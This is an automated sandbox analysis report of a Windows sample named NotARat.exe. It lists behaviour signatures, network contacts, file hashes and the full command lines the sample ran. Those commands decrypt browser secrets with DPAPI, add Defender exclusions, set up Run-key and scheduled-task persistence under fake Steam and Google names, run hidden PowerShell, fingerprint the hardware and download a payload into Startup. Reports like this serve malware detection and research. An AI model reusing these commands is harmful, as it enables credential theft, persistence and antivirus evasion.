Analysis Overview
SHA256
2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08
Threat Level: Likely malicious
The file NotARat.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Window
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Detects videocard installed
Enumerates processes with tasklist
Modifies registry key
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 12:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 12:42
Reported
2024-06-26 12:43
Platform
win10v2004-20240611-en
Max time kernel
5s
Max time network
10s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NotARat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NotARat.exe | N/A |
Reads user/profile data of web browsers
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NotARat.exe
"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp" "c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp" "c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\NotARat.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.203:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 203.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/4684-72-0x00007FF9F7413000-0x00007FF9F7415000-memory.dmp
memory/4684-73-0x0000025E06EF0000-0x0000025E06F12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_psgny50s.boa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4684-83-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
memory/4684-84-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
memory/4684-85-0x0000025E21690000-0x0000025E216D4000-memory.dmp
memory/4684-86-0x0000025E21AB0000-0x0000025E21B26000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline
| MD5 | 40ee34a07d711f250ff9b3db33200775 |
| SHA1 | 8d10361f431c5b0fa2dea43e50ace98200df4e56 |
| SHA256 | c077e18005105bb085d28bfd7af097b7006171f1106bcc0d0253b335f1b6c41d |
| SHA512 | 3328cb64bf0710f60594e86c67d8ed1dbb57da5f9c2e9bd3e6101c982941d581357c181a9e778d2a1b5c945870728a67da9540db793159cd937f2c2df337233e |
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP
| MD5 | 4cb085e7d9c7d80b7e6a5b344dfc1f7a |
| SHA1 | 1e5c416734ea81f75608744caefe2f24a295db66 |
| SHA256 | 41f2a7145c9d98c44e8a2c81d3b7cb4bbefa322bb04236b8b823fe81b06174bf |
| SHA512 | a84309390fe72ba6e6019f082a162ef8fc01e33dc5ccc0cb7c3f20a9298c5578d15fb0dd4827354d780b410b2110f4dc888b4131f284d412c417ef745919a746 |
C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp
| MD5 | bebc6a893895a28a4a7055b53cc0a771 |
| SHA1 | 38cf7ab944ac1782d0b03f9764dab940caa1e840 |
| SHA256 | 4cb7b6ec0f96dcf276e9cfeef0b56d8ba4afb319709f15fc6050b2a4b0c9b402 |
| SHA512 | 6ec569b179e539d92aec8c1db49b356a304b9b589241e529eb28fdbe222261c79a802f915c07aaf1fd7309e97c02266a20892d7bde2521322b7da16ccf3c5e29 |
C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.dll
| MD5 | c2671dbb00382d83e362947523d39350 |
| SHA1 | e4cc7555fd54941d906f92758cab37a2c2a34a10 |
| SHA256 | b59abad7e01c08608fe4de16190f853069f8341835f84e15557a4636a301e383 |
| SHA512 | 44b6ec9729278173a3717c2d628c7e69634b7e3159e79842b5426568f2f1f653d424054f4f5c658025a1b4683ec7a6eaa0fa7f665419ad40c3901f5ec9d72a32 |
memory/4684-99-0x0000025E06F50000-0x0000025E06F58000-memory.dmp
memory/4684-103-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/3988-115-0x000001C53F570000-0x000001C53F5C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f79387492e5d2264cb94e2f480feaf78 |
| SHA1 | 13f478f478bf824d8cccb611ac9b2645d5523c93 |
| SHA256 | f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7 |
| SHA512 | c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 390d7206a5094d20f7a129fabb9695d9 |
| SHA1 | 4b45920bd622c5356a5b1b991cc4dc9e3b6cb7b0 |
| SHA256 | 8daae1b798f946102fb352c485d4c86f2f8feb651cb7d9f330e9d0f488d40ed5 |
| SHA512 | dfebf2b6b94021f6bf4973c5d1d34324aea2aa0fa444a2a9024c3ba78e13630eb8fd201fb3b08eb512b89ef8b6e1d1161720c0618d0de10ebb5000c249e89384 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 718273a5fd30c297d410e340722fc6db |
| SHA1 | cf82ae296e8b006db9fb51ced40b57db1cc4e698 |
| SHA256 | 6ce02325b6861901177d845dd9d3a6de67790d53e8b3942b0d4348d650d0c3b7 |
| SHA512 | 133d0d22f630541b0a56e3a3cb123516e9b9b78ddd141cb47e33d9ba8ec1aba79161be1fe2cca263b0753d6f1eb9e93581479dce0230fabf35b5f694fdbf4572 |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline
| MD5 | e26515e913261f3b9ed1189606f1371e |
| SHA1 | bb1a64d55de75515f14b24296750cb6777ac9c05 |
| SHA256 | eec480bc88ea2fcc2e3df0cf7475ca423e16a8d780c883a1ef0694db2c786690 |
| SHA512 | 328dddcac965a5a978c8b2e7141ccbd693463192886e7fcb03c76431dbd23e93e91415ea22547bba6f8f1f1d2fe0b0ffaf15778f8ccb9a59504f0f37116e953c |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP
| MD5 | 263525609d6154a748a4030d53cfc196 |
| SHA1 | 72d4db97cd554b9252c3c6479bd3ce2a2d208d56 |
| SHA256 | c27bd4e13f51d0c1ad1e43a97cbcde7468e7654cdc28303b4dd0ec0da5369e44 |
| SHA512 | 6748ba5a421ff8e291e98524a36519ec41f406f76dab19fda33c9ccd4e3210b82eb2376c5832fc827a8d9e5127062cad8213f7f58ac037e9f47ff2633ddc4900 |
C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp
| MD5 | fc8911df2ebdbbe181344d9711bcb7d8 |
| SHA1 | b44d5a8c07dcbcee6263f7e3edc873e3adff1811 |
